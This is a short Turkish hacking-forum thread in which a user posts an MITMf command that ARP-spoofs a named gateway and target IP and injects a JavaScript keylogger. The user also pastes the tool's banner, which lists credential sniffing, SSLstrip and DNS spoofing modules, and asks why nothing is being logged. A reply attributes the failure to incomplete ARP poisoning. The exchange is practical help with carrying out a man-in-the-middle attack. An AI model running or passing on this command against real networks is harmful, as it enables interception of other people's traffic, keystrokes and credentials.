MITMf kullananlar

3jDeR

Üye
29 Tem 2017
85
1
python mitmf.py -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.102 --jskeylogger

███▄ ▄███▓ ██▓▄▄▄█████▓ ███▄ ▄███▓ █████▒
▓██▒▀█▀ ██▒▓██▒▓ ██▒ ▓▒▓██▒▀█▀ ██▒▓██ ▒
▓██ ▓██░▒██▒▒ ▓██░ ▒░▓██ ▓██░▒████ ░
▒██ ▒██ ░██░░ ▓██▓ ░ ▒██ ▒██ ░▓█▒ ░
▒██▒ ░██▒░██░ ▒██▒ ░ ▒██▒ ░██▒░▒█░
░ ▒░ ░ ░░▓ ▒ ░░ ░ ▒░ ░ ░ ▒ ░
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░
░ ░ ▒ ░ ░ ░ ░ ░ ░
░ ░ ░

[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Spoof v0.6
| |_ ARP spoofing enabled
|_ JSKeylogger v0.2
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
* Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

Boyle yazıyorum wın 10dan gırıyorum bı yerlere log tutmuyor acaba wifi oldugu ıcın mı yavassa ınternet

Moderatör tarafında düzenlendi:

3jDeR

Üye
29 Tem 2017
85
1
Muhtemel olarak ARP zehirlemesini tam olarak gerçekleştiremediğinden modeme giden verileri size yollayamamakta.
Deneme amaçlı kendi bilgisayarınızla bağlantı kurmayı deneyebilirsiniz.

(Bende 3 günden beri MITMf uygulamasının tüm yönleriyle ilgili bir makale hazırlamakla meşgulüm ve eski zamanlarda yaptığım ARP zehirleme nedense bugünlerde çalışmaz oldu. Ben hala araştırma içerisindeyim bir çözüm bulursam hem konu olarak hemde yorum olarak geri döneceğim)

Dört gözle bunla ilgili makale veya videonu beklıyorum :D :D sağol

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.